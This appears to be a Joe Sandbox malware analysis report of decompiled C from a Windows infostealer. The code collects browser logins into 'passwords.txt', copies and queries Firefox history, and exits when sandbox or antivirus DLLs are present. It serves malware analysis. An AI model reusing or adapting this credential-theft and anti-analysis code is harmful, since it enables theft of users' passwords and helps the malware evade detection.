                                                                                						 *((intOrPtr*)(_t353 - 0x34)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x38)) = _t285;
                                                                                						 *(_t353 - 0x48) = _t285;
                                                                                						 *((intOrPtr*)(_t353 - 0x50)) = _t189;
                                                                                						 *((intOrPtr*)(_t353 - 0x54)) = _t285;
                                                                                						 *(_t353 - 0x64) = _t285;
                                                                                						 *(_t353 - 4) = 0xe;
                                                                                						_t190 = E004037E9(_t353 - 0xd4, L"passwords.txt");
                                                                                						_t367 =  *((intOrPtr*)(_t190 + 0x14)) - 8;
                                                                                						if( *((intOrPtr*)(_t190 + 0x14)) >= 8) {
                                                                                							_t190 =  *_t190;
                                                                                						}
                                                                                						_t191 = E0041E704(_t190, L"a+");
                                                                                						_pop(_t299);
                                                                                						_t337 = 0;
                                                                                						_t343 = _t353 - 0xd4;
                                                                                						 *((intOrPtr*)(_t353 - 0x148)) = _t191;
                                                                                						E00403960(0, _t353 - 0xd4, 0);
                                                                                						while(1) {
                                                                                							_push(0xa);
                                                                                							_push(_t353 +  *((intOrPtr*)( *((intOrPtr*)(_t353 - 0x210)) + 4)) - 0x210);
                                                                                							_push(E00414FCB(_t285, _t299, _t337, _t343, _t367) & 0x000000ff);
                                                                                							_push(_t353 - 0x2c);
                                                                                							_push(_t353 - 0x210);
                                                                                							_t299 =  *((intOrPtr*)( *((intOrPtr*)(E00415307(_t285, _t330, _t337, _t343, _t367))) + 4)) + _t200;
                                                                                							_t358 = _t358 + 0xc;
                                                                                							asm("sbb eax, eax");
                                                                                							_t205 =  !( ~( *(_t299 + 0xc) & 0x00000006));
                                                                                							_t368 = _t299 & _t205;
                                                                                							if((_t299 & _t205) == 0) {
                                                                                								break;
                                                                                							}
                                                                                							_t344 = E0040C664(_t353 - 0x2c,  *0x449bc4,  *((intOrPtr*)(_t353 - 0x14c)) + 1);
                                                                                							__eflags = _t344 - 0xffffffff;
                                                                                							if(_t344 != 0xffffffff) {
                                                                                								E00403EAE(_t353 - 0x2c, _t285, 9);
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t320 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t320 = _t353 - 0x2c;
                                                                                								}
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t268 =  *((intOrPtr*)(_t353 - 0x1c));
                                                                                								_t334 =  *((intOrPtr*)(_t353 - 0x1c)) + _t320;
                                                                                								_t321 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t321 = _t353 - 0x2c;
                                                                                								}
                                                                                								E00414325(_t353 - 0x2c, _t353 - 0x158, _t268 + _t321 + 0xfffffff9, _t334);
                                                                                								_t299 = _t353 - 0x9c;
                                                                                								E00403C13(_t353 - 0x9c, _t353 - 0x2c, 0, 0xffffffff);
                                                                                								_t285 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							_t346 = E0040C664(_t353 - 0x2c,  *0x449d68, _t344 + 1);
                                                                                							__eflags = _t346 - 0xffffffff;
                                                                                							if(_t346 != 0xffffffff) {
                                                                                								E00403EAE(_t353 - 0x2c, _t285, 9);
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t317 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t317 = _t353 - 0x2c;
                                                                                								}
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t260 =  *((intOrPtr*)(_t353 - 0x1c));
                                                                                								_t333 =  *((intOrPtr*)(_t353 - 0x1c)) + _t317;
                                                                                								_t318 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t318 = _t353 - 0x2c;
                                                                                								}
                                                                                								E00414325(_t353 - 0x2c, _t353 - 0x154, _t260 + _t318 + 0xfffffff9, _t333);
                                                                                								_t299 = _t353 - 0x80;
                                                                                								E00403C13(_t353 - 0x80, _t353 - 0x2c, 0, 0xffffffff);
                                                                                								_t285 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							_t348 = E0040C664(_t353 - 0x2c,  *0x449e40, _t346 + 1);
                                                                                							__eflags = _t348 - 0xffffffff;
                                                                                							if(_t348 != 0xffffffff) {
                                                                                								E00403EAE(_t353 - 0x2c, _t285, 9);
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t314 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t314 = _t353 - 0x2c;
                                                                                								}
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t252 =  *((intOrPtr*)(_t353 - 0x1c));
                                                                                								_t332 =  *((intOrPtr*)(_t353 - 0x1c)) + _t314;
                                                                                								_t315 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t315 = _t353 - 0x2c;
                                                                                								}
                                                                                								E00414325(_t353 - 0x2c, _t353 - 0x150, _t252 + _t315 + 0xfffffff9, _t332);
                                                                                								_t299 = _t353 - 0x48;
                                                                                								E00403C13(_t353 - 0x48, _t353 - 0x2c, 0, 0xffffffff);
                                                                                								_t285 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							_t215 = E0040C664(_t353 - 0x2c,  *0x449e6c, _t348 + 1);
                                                                                							 *((intOrPtr*)(_t353 - 0x14c)) = _t215;
                                                                                							__eflags = _t215 - 0xffffffff;
                                                                                							if(_t215 != 0xffffffff) {
                                                                                								E00403EAE(_t353 - 0x2c, _t285, 0x1b);
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t311 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t311 = _t353 - 0x2c;
                                                                                								}
                                                                                								__eflags =  *((intOrPtr*)(_t353 - 0x18)) - 0x10;
                                                                                								_t240 =  *((intOrPtr*)(_t353 - 0x1c));
                                                                                								_t331 =  *((intOrPtr*)(_t353 - 0x1c)) + _t311;
                                                                                								_t312 =  *((intOrPtr*)(_t353 - 0x2c));
                                                                                								if( *((intOrPtr*)(_t353 - 0x18)) < 0x10) {
                                                                                									_t312 = _t353 - 0x2c;
                                                                                								}
                                                                                								E00414325(_t353 - 0x2c, _t353 - 0x160, _t240 + _t312 + 0xfffffff9, _t331);
                                                                                								_t358 = _t358 - 0x1c;
                                                                                								 *((intOrPtr*)(_t353 - 0x15c)) = _t358;
                                                                                								E0040410F(_t358, _t353 - 0x2c);
                                                                                								_push(_t353 - 0xb8);
                                                                                								_t248 = E00417286(_t353 - 0x160, _t337, _t358, __eflags);
                                                                                								_t337 = _t353 - 0x64;
                                                                                								 *(_t353 - 4) = 0xf;
                                                                                								E0040CFB8(_t353 - 0x64, _t248);
                                                                                								_t299 = _t353 - 0xb8;
                                                                                								 *(_t353 - 4) = 0xe;
                                                                                								E00402C34(_t353 - 0xb8, 1, 0);
                                                                                								_t285 = 0;
                                                                                								__eflags = 0;
                                                                                							}
                                                                                							_t343 = 0x43e028;
                                                                                							_t330 = _t353 - 0x9c;
                                                                                							__eflags = E0040D08A( *((intOrPtr*)(_t353 - 0x8c)), _t353 - 0x9c, 0x43e028, _t285);
                                                                                							if(__eflags != 0) {
                                                                                								_t330 = _t353 - 0x80;
                                                                                								__eflags = E0040D08A( *((intOrPtr*)(_t353 - 0x70)), _t353 - 0x80, 0x43e028, _t285);
                                                                                								if(__eflags != 0) {
                                                                                									_t330 = _t353 - 0x48;
                                                                                									__eflags = E0040D08A( *((intOrPtr*)(_t353 - 0x38)), _t353 - 0x48, 0x43e028, _t285);
                                                                                									if(__eflags != 0) {
                                                                                										_t330 = _t353 - 0x64;
                                                                                										__eflags = E0040D08A( *((intOrPtr*)(_t353 - 0x54)), _t353 - 0x64, 0x43e028, _t285);
                                                                                										if(__eflags != 0) {
                                                                                											_push( *0x449fd0);
                                                                                											_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                											E0041E879(_t285, _t337, 0x43e028, __eflags);
                                                                                											_push(":");
                                                                                											_push(_t353 - 0x144);
                                                                                											_t337 = _t353 - 0x9c;
                                                                                											_t226 = E0040D337(_t285, _t353 - 0x9c, 0x43e028, __eflags);
                                                                                											 *(_t353 - 4) = 0x10;
                                                                                											_t227 = E0040D39B(_t226, _t226, _t353 - 0x128, _t353 - 0x80);
                                                                                											_t359 = _t358 + 0x18;
                                                                                											__eflags =  *((intOrPtr*)(_t227 + 0x14)) - 0x10;
                                                                                											if(__eflags >= 0) {
                                                                                												_t227 =  *_t227;
                                                                                											}
                                                                                											_push(_t227);
                                                                                											_push("Host: %s\n");
                                                                                											_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                											E0041E879(_t285, _t337, _t343, __eflags);
                                                                                											_t360 = _t359 + 0xc;
                                                                                											E00402C34(_t353 - 0x128, 1, _t285);
                                                                                											 *(_t353 - 4) = 0xe;
                                                                                											E00402C34(_t353 - 0x144, 1, _t285);
                                                                                											__eflags =  *((intOrPtr*)(_t353 - 0x34)) - 0x10;
                                                                                											_t231 =  *(_t353 - 0x48);
                                                                                											if(__eflags < 0) {
                                                                                												_t231 = _t353 - 0x48;
                                                                                											}
                                                                                											_push(_t231);
                                                                                											_push("Login: %s\n");
                                                                                											_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                											E0041E879(_t285, _t337, _t343, __eflags);
                                                                                											_t233 =  *(_t353 - 0x64);
                                                                                											_t361 = _t360 + 0xc;
                                                                                											__eflags =  *((intOrPtr*)(_t353 - 0x50)) - 0x10;
                                                                                											if(__eflags < 0) {
                                                                                												_t233 = _t353 - 0x64;
                                                                                											}
                                                                                											_push(_t233);
                                                                                											_push("Password: %s\n\n");
                                                                                											_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                											E0041E879(_t285, _t337, _t343, __eflags);
                                                                                											_t358 = _t361 + 0xc;
                                                                                											E00403A16(_t353 - 0x9c, __eflags, _t343, _t285);
                                                                                											E00403A16(_t353 - 0x80, __eflags, _t343, _t285);
                                                                                											E00403A16(_t353 - 0x48, __eflags, _t343, _t285);
                                                                                											_t299 = _t353 - 0x64;
                                                                                											E00403A16(_t353 - 0x64, __eflags, _t343, _t285);
                                                                                											 *0x44a08c =  *0x44a08c + 1;
                                                                                											__eflags =  *0x44a08c;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						_push( *((intOrPtr*)(_t353 - 0x148)));
                                                                                						E0041EAA2(_t285, _t337, _t343, _t368);
                                                                                						_t340 = 1;
                                                                                						E00402C34(_t353 - 0x64, 1, _t285);
                                                                                						E00402C34(_t353 - 0x48, 1, _t285);
                                                                                						E00402C34(_t353 - 0x80, 1, _t285);
                                                                                						E00402C34(_t353 - 0x9c, 1, _t285);
                                                                                						E00402C34(_t353 - 0x2c, 1, _t285);
                                                                                						 *(_t353 - 4) =  *(_t353 - 4) | 0xffffffff;
                                                                                						E00414538(_t353 - 0x1a8, 1,  *(_t353 - 4));
                                                                                						 *((intOrPtr*)(_t353 - 0x1a8)) = 0x441150;
                                                                                						E0041D4EA(_t353 - 0x1a8);
                                                                                						goto L46;
                                                                                					}
                                                                                				}
                                                                                				 *((intOrPtr*)(_t353 - 0x148)) = 1;
                                                                                				if((_t173 & 0x00000010) == 0) {
                                                                                					goto L5;
                                                                                				}
                                                                                				goto L4;
                                                                                			}

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004112E4
                                                                                  • Part of subcall function 00415BB2: GetUserNameA.ADVAPI32(?,?), ref: 00415BE0
                                                                                  • Part of subcall function 004175C4: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,\Opera Software\,?,00000000), ref: 004175EF
                                                                                  • Part of subcall function 004175C4: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00414013), ref: 0041761E
                                                                                • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,\Opera Stable\,?,?,?,?,00000000), ref: 00411342
                                                                                  • Part of subcall function 00403EAE: std::_Xinvalid_argument.LIBCPMT ref: 00403EC1
                                                                                  • Part of subcall function 00403EAE: _memmove.LIBCMT ref: 00403EFC
                                                                                • _fprintf.LIBCMT ref: 004116EC
                                                                                • _fprintf.LIBCMT ref: 00411735
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • _fprintf.LIBCMT ref: 00411775
                                                                                • _fprintf.LIBCMT ref: 00411795
                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041187E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _fprintf$ByteCharMultiWide_memmove$AttributesFileH_prolog3_Ios_base_dtorNameUserXinvalid_argumentstd::_std::ios_base::_
                                                                                • String ID: (C$Host: %s$Login: %s$Password: %s$passwords.txt
                                                                                • API String ID: 856706163-654174680
                                                                                • Opcode ID: 699470228641c97b704b6bb7bcefa3ddd210648f85178f3bba91759b76444295
                                                                                • Instruction ID: e4472bc2177690b71c4fb2eea9515a3b38977c32137634e10e36fb75ffdc79b5
                                                                                • Opcode Fuzzy Hash: 699470228641c97b704b6bb7bcefa3ddd210648f85178f3bba91759b76444295
                                                                                • Instruction Fuzzy Hash: 9E029071D00218AFDF24DBA9CC81EDEB778AF55308F0045AAE519B31E1DB785E88CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E00410C17(void* __ebx, CHAR* __ecx, void* __edx) {
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t23;
                                                                                				void* _t38;
                                                                                				int _t40;
                                                                                				void* _t43;
                                                                                				void* _t48;
                                                                                				void* _t62;
                                                                                				void* _t63;
                                                                                				CHAR* _t64;
                                                                                				void* _t65;
                                                                                				void* _t66;
                                                                                				void* _t67;
                                                                                				void* _t70;
                                                                                				signed int _t71;
                                                                                				void* _t73;
                                                                                				void* _t75;
                                                                                				void* _t77;
                                                                                
                                                                                				_t62 = __edx;
                                                                                				_t52 = __ebx;
                                                                                				_t71 = _t73 - 0x198;
                                                                                				_t23 =  *0x447674; // 0x4124c941
                                                                                				 *(_t71 + 0x194) = _t23 ^ _t71;
                                                                                				 *((intOrPtr*)(_t71 - 0x80)) =  *((intOrPtr*)(_t71 + 0x1a0));
                                                                                				_t64 = __ecx;
                                                                                				GetCurrentDirectoryA(0x104, _t71 + 0x90);
                                                                                				 *0x44a1b8(_t71 + 0x90, "\\temp", _t63, _t67);
                                                                                				CopyFileA(_t64, _t71 + 0x90, 1);
                                                                                				E00427E30(_t71 - 0x74, 0, 0x104);
                                                                                				wsprintfA(_t71 - 0x74, "History\\%s_%s.txt",  *((intOrPtr*)(_t71 - 0x80)), __ebx);
                                                                                				_t38 =  *0x44a0a4(_t71 + 0x90, _t71 - 0x7c);
                                                                                				_t75 = _t73 - 0x218 + 0x24;
                                                                                				if(_t38 == 0) {
                                                                                					_t43 =  *0x44a058( *((intOrPtr*)(_t71 - 0x7c)), "SELECT url FROM moz_places", 0xffffffff, _t71 - 0x78, 0);
                                                                                					_t77 = _t75 + 0x14;
                                                                                					if(_t43 == 0) {
                                                                                						_t66 = E00420300(_t71 - 0x74, "w");
                                                                                						if(_t66 != 0) {
                                                                                							_t48 =  *0x44a074( *((intOrPtr*)(_t71 - 0x78)));
                                                                                							while(1) {
                                                                                								_t81 = _t48 - 0x64;
                                                                                								if(_t48 != 0x64) {
                                                                                									break;
                                                                                								}
                                                                                								E0041E879(_t52, _t66, 0, __eflags);
                                                                                								_t48 =  *0x44a074( *((intOrPtr*)(_t71 - 0x78)), _t66, "%s\n",  *0x44a094( *((intOrPtr*)(_t71 - 0x78)), 0));
                                                                                								_t77 = _t77 + 0x18;
                                                                                							}
                                                                                							_push(_t66);
                                                                                							E0041EAA2(_t52, _t66, 0, _t81);
                                                                                						}
                                                                                					}
                                                                                					 *0x44a078( *((intOrPtr*)(_t71 - 0x78)));
                                                                                					 *0x44a0a8( *((intOrPtr*)(_t71 - 0x7c)));
                                                                                				}
                                                                                				_t40 = DeleteFileA(_t71 + 0x90);
                                                                                				_pop(_t65);
                                                                                				_pop(_t70);
                                                                                				return E0041DEB4(_t40, _t52,  *(_t71 + 0x194) ^ _t71, _t62, _t65, _t70);
                                                                                			}

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,(>A(C), ref: 00410C4C
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 00410C5E
                                                                                • CopyFileA.KERNEL32 ref: 00410C6E
                                                                                • _memset.LIBCMT ref: 00410C7C
                                                                                • wsprintfA.USER32 ref: 00410C8E
                                                                                • DeleteFileA.KERNEL32(?), ref: 00410D37
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • _fprintf.LIBCMT ref: 00410CFF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$CopyCurrentDeleteDirectory__fsopen_fprintf_memsetlstrcatwsprintf
                                                                                • String ID: %s$(>A(C$History\%s_%s.txt$SELECT url FROM moz_places$\temp
                                                                                • API String ID: 2003248957-2615988106
                                                                                • Opcode ID: 9ec1d1811f92c54f2c3e68a46ede3bdb6cb54a9a836e3299bd88e3546e774ad8
                                                                                • Instruction ID: 0d36796b35f77b62300b62df0302a96afa3318edf7f95a5120b5e78e4b8337b5
                                                                                • Opcode Fuzzy Hash: 9ec1d1811f92c54f2c3e68a46ede3bdb6cb54a9a836e3299bd88e3546e774ad8
                                                                                • Instruction Fuzzy Hash: 72318272940118AFDB209FB5EC49EEE7B7CEF05314F20012AF509D2051DB7995948F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E0040104C(void* __ecx) {
                                                                                				void* _t1;
                                                                                				void* _t2;
                                                                                				void* _t4;
                                                                                				void* _t5;
                                                                                				void* _t6;
                                                                                				void* _t7;
                                                                                				void* _t8;
                                                                                				void* _t9;
                                                                                				void* _t10;
                                                                                				void* _t11;
                                                                                				void* _t12;
                                                                                				void* _t13;
                                                                                
                                                                                				_t2 = E00401000(_t1, __ecx, L"avghookx.dll");
                                                                                				_pop(_t4);
                                                                                				if(_t2 != 0) {
                                                                                					L11:
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t4, L"avghooka.dll");
                                                                                				_pop(_t5);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t5, L"snxhk.dll");
                                                                                				_pop(_t6);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t6, L"sbiedll.dll");
                                                                                				_pop(_t7);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t7, L"api_log.dll");
                                                                                				_pop(_t8);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t8, L"dir_watch.dll");
                                                                                				_pop(_t9);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t9, L"pstorec.dll");
                                                                                				_pop(_t10);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t10, L"vmcheck.dll");
                                                                                				_pop(_t11);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t11, L"wpespy.dll");
                                                                                				_pop(_t12);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t12, L"cmdvrt32.dll");
                                                                                				_pop(_t13);
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				_t2 = E00401000(_t2, _t13, L"cmdvrt64.dll");
                                                                                				if(_t2 != 0) {
                                                                                					goto L11;
                                                                                				}
                                                                                				return _t2;
                                                                                			}

                                                                                APIs
                                                                                • ExitProcess.KERNEL32 ref: 004010FB
                                                                                  • Part of subcall function 00401000: lstrcmpiW.KERNEL32(?,?), ref: 00401032
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcesslstrcmpi
                                                                                • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                • API String ID: 1394296034-3272603366
                                                                                • Opcode ID: 8a112e75be89e0781b1c67a84262aa7006b9202b7b0638c0490da7308202c3fa
                                                                                • Instruction ID: 105192daea2d7df0ef5c5ce74c34fc0b99949b956cd25034320473b509aefa8a
                                                                                • Opcode Fuzzy Hash: 8a112e75be89e0781b1c67a84262aa7006b9202b7b0638c0490da7308202c3fa
                                                                                • Instruction Fuzzy Hash: 1401C629540B8714DD3A2655682775A13144B577EEF3050AFF6C03ADE74FAD04C510AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E004077AF(signed int __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				signed int _v8;
                                                                                				char _v275;
                                                                                				char _v276;
                                                                                				char _v540;
                                                                                				struct _FILETIME _v560;
                                                                                				struct _FILETIME _v568;
                                                                                				struct _FILETIME _v576;
                                                                                				unsigned int _v580;
                                                                                				char _v844;
                                                                                				char _v845;
                                                                                				void* _v852;
                                                                                				signed int _v856;
                                                                                				long _v860;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t91;
                                                                                				intOrPtr _t94;
                                                                                				signed int _t102;
                                                                                				void* _t105;
                                                                                				void* _t106;
                                                                                				void* _t110;
                                                                                				void* _t113;
                                                                                				signed char _t117;
                                                                                				long _t118;
                                                                                				void* _t130;
                                                                                				int _t142;
                                                                                				long _t149;
                                                                                				long _t153;
                                                                                				long _t164;
                                                                                				long _t167;
                                                                                				void* _t175;
                                                                                				void* _t178;
                                                                                				signed int _t184;
                                                                                
                                                                                				_t178 = __edx;
                                                                                				_t91 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t91 ^ _t184;
                                                                                				_t153 = __ecx;
                                                                                				_v856 = __ecx;
                                                                                				_v852 = _a8;
                                                                                				if(_a16 == 3) {
                                                                                					_t94 =  *((intOrPtr*)(__ecx + 4));
                                                                                					_t181 = _a4;
                                                                                					__eflags = _t181 - _t94;
                                                                                					if(_t181 == _t94) {
                                                                                						L13:
                                                                                						_t181 = E00406CCB( *_t153, _a12, _v852,  &_v845);
                                                                                						__eflags = _t181;
                                                                                						if(_t181 <= 0) {
                                                                                							_t179 =  *_t153;
                                                                                							E00406EF9( *_t153);
                                                                                							_t25 = _t153 + 4;
                                                                                							 *_t25 =  *(_t153 + 4) | 0xffffffff;
                                                                                							__eflags =  *_t25;
                                                                                						}
                                                                                						__eflags = _v845;
                                                                                						if(_v845 == 0) {
                                                                                							__eflags = _t181;
                                                                                							if(_t181 <= 0) {
                                                                                								__eflags = _t181 - 0xffffff96;
                                                                                								_t102 = ((0 | _t181 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
                                                                                							} else {
                                                                                								_t102 = 0x600;
                                                                                							}
                                                                                							goto L70;
                                                                                						} else {
                                                                                							L16:
                                                                                							_t102 = 0;
                                                                                							L70:
                                                                                							return E0041DEB4(_t102, _t153, _v8 ^ _t184, _t178, _t179, _t181);
                                                                                						}
                                                                                					}
                                                                                					__eflags = _t94 - 0xffffffff;
                                                                                					if(_t94 != 0xffffffff) {
                                                                                						_t179 =  *__ecx;
                                                                                						E00406EF9( *__ecx);
                                                                                					}
                                                                                					_t105 =  *_t153;
                                                                                					 *(_t153 + 4) =  *(_t153 + 4) | 0xffffffff;
                                                                                					__eflags = _t181 -  *((intOrPtr*)(_t105 + 4));
                                                                                					if(_t181 >=  *((intOrPtr*)(_t105 + 4))) {
                                                                                						L3:
                                                                                						_t102 = 0x10000;
                                                                                						goto L70;
                                                                                					}
                                                                                					__eflags = _t181 -  *((intOrPtr*)(_t105 + 0x10));
                                                                                					if(_t181 <  *((intOrPtr*)(_t105 + 0x10))) {
                                                                                						E00406801(_t105);
                                                                                						_t181 = _a4;
                                                                                					}
                                                                                					_t106 =  *_t153;
                                                                                					__eflags =  *((intOrPtr*)(_t106 + 0x10)) - _t181;
                                                                                					if( *((intOrPtr*)(_t106 + 0x10)) >= _t181) {
                                                                                						L12:
                                                                                						E00406B76( *_t153,  *((intOrPtr*)(_t153 + 0x138)));
                                                                                						_t164 = _v856;
                                                                                						 *((intOrPtr*)(_t164 + 4)) = _a4;
                                                                                						_t153 = _t164;
                                                                                						goto L13;
                                                                                					} else {
                                                                                						do {
                                                                                							E00406836( *_t153);
                                                                                							_t110 =  *_t153;
                                                                                							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - _a4;
                                                                                						} while ( *((intOrPtr*)(_t110 + 0x10)) < _a4);
                                                                                						goto L12;
                                                                                					}
                                                                                				}
                                                                                				if(_a16 == 2 || _a16 == 1) {
                                                                                					__eflags =  *(_t153 + 4) - 0xffffffff;
                                                                                					if( *(_t153 + 4) != 0xffffffff) {
                                                                                						E00406EF9( *_t153);
                                                                                					}
                                                                                					_t181 =  *_t153;
                                                                                					_t179 = _a4;
                                                                                					 *(_t153 + 4) =  *(_t153 + 4) | 0xffffffff;
                                                                                					__eflags = _t179 -  *((intOrPtr*)(_t181 + 4));
                                                                                					if(_t179 >=  *((intOrPtr*)(_t181 + 4))) {
                                                                                						goto L3;
                                                                                					} else {
                                                                                						__eflags = _t179 -  *((intOrPtr*)(_t181 + 0x10));
                                                                                						if(_t179 <  *((intOrPtr*)(_t181 + 0x10))) {
                                                                                							E00406801(_t181);
                                                                                						}
                                                                                						while(1) {
                                                                                							_t113 =  *_t153;
                                                                                							__eflags =  *((intOrPtr*)(_t113 + 0x10)) - _t179;
                                                                                							if( *((intOrPtr*)(_t113 + 0x10)) >= _t179) {
                                                                                								break;
                                                                                							}
                                                                                							_t181 =  *_t153;
                                                                                							E00406836( *_t153);
                                                                                						}
                                                                                						_t179 = _v856;
                                                                                						_t153 =  &_v844;
                                                                                						E00406FE6(_t153, _t179, _t178, _t179);
                                                                                						_t117 = _v580 >> 4;
                                                                                						__eflags = _t117 & 0x00000001;
                                                                                						if((_t117 & 0x00000001) == 0) {
                                                                                							__eflags = _a16 - 1;
                                                                                							_v540 = 0;
                                                                                							if(_a16 != 1) {
                                                                                								_t181 = _v852;
                                                                                								_t118 =  *_t181;
                                                                                								_t167 = _t181;
                                                                                								while(1) {
                                                                                									__eflags = _t118;
                                                                                									if(_t118 == 0) {
                                                                                										break;
                                                                                									}
                                                                                									__eflags = _t118 - 0x2f;
                                                                                									if(_t118 == 0x2f) {
                                                                                										L41:
                                                                                										_t153 = _t167 + 1;
                                                                                										L42:
                                                                                										_t167 = _t167 + 1;
                                                                                										__eflags = _t167;
                                                                                										_t118 =  *_t167;
                                                                                										continue;
                                                                                									}
                                                                                									__eflags = _t118 - 0x5c;
                                                                                									if(_t118 != 0x5c) {
                                                                                										goto L42;
                                                                                									}
                                                                                									goto L41;
                                                                                								}
